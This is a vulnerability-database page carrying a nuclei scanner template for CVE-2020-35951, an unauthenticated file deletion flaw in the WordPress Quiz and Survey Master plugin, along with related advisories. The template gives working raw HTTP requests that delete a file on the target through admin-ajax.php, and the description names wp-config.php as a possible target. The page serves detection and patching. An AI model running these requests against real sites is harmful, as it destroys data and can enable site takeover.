Lucene search
K

Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion vulnerability allows unauthenticated file deletions, leading to server compromise and data loss

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-35951
1 Jan 202107:32
circl
CNNVD
WordPress Quiz and Survey Master plugin security vulnerability
31 Dec 202000:00
cnnvd
CVE
CVE-2020-35951
1 Jan 202103:27
cve
Cvelist
CVE-2020-35951
1 Jan 202103:27
cvelist
NVD
CVE-2020-35951
1 Jan 202104:15
nvd
OSV
CVE-2020-35951
1 Jan 202104:15
osv
Prion
Buffer overflow
1 Jan 202104:15
prion
RedhatCVE
CVE-2020-35951
5 Feb 202513:15
redhatcve
Tenable Nessus
Quiz And Survey Master Plugin for WordPress < 7.0.1 Multiple Vulnerabilities
31 Aug 202000:00
nessus
wpexploit
Quiz and Survey Master < 7.0.1 - Unauthenticated Arbitrary File Deletion
13 Aug 202000:00
wpexploit
Rows per page
id: CVE-2020-35951

info:
  name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
  author: princechaddha
  severity: critical
  description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
  impact: |
    This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.
  remediation: |
    Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35951
    - https://wpscan.com/vulnerability/10348
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
    cvss-score: 9.9
    cve-id: CVE-2020-35951
    cwe-id: CWE-306
    epss-score: 0.76328
    epss-percentile: 0.99475
    cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    vendor: expresstech
    product: quiz_and_survey_master
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92


        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="action"

        qsm_remove_file_fd_question
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="file_url"

        {{fullpath}}wp-content/plugins/quiz-master-next/README.md
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92--
      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')

      - type: word
        part: body
        words:
          - '{"type":"success","message":"File removed successfully"}'

    extractors:
      - type: regex
        name: fullpath
        group: 1
        regex:
          - not found in <b>([/a-z_]+)wp
        internal: true
        part: body
# digest: 4a0a00473045022100f784b39460105b2b7864352d95f3547c448aeb420ae7af954e6d0acd6f4d94490220740f1a895a4c2b4abc50780ea5340c4457e5c2759f605b7ef1b24acc0b111d46:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.4
CVSS 3.19.9
EPSS0.76328
24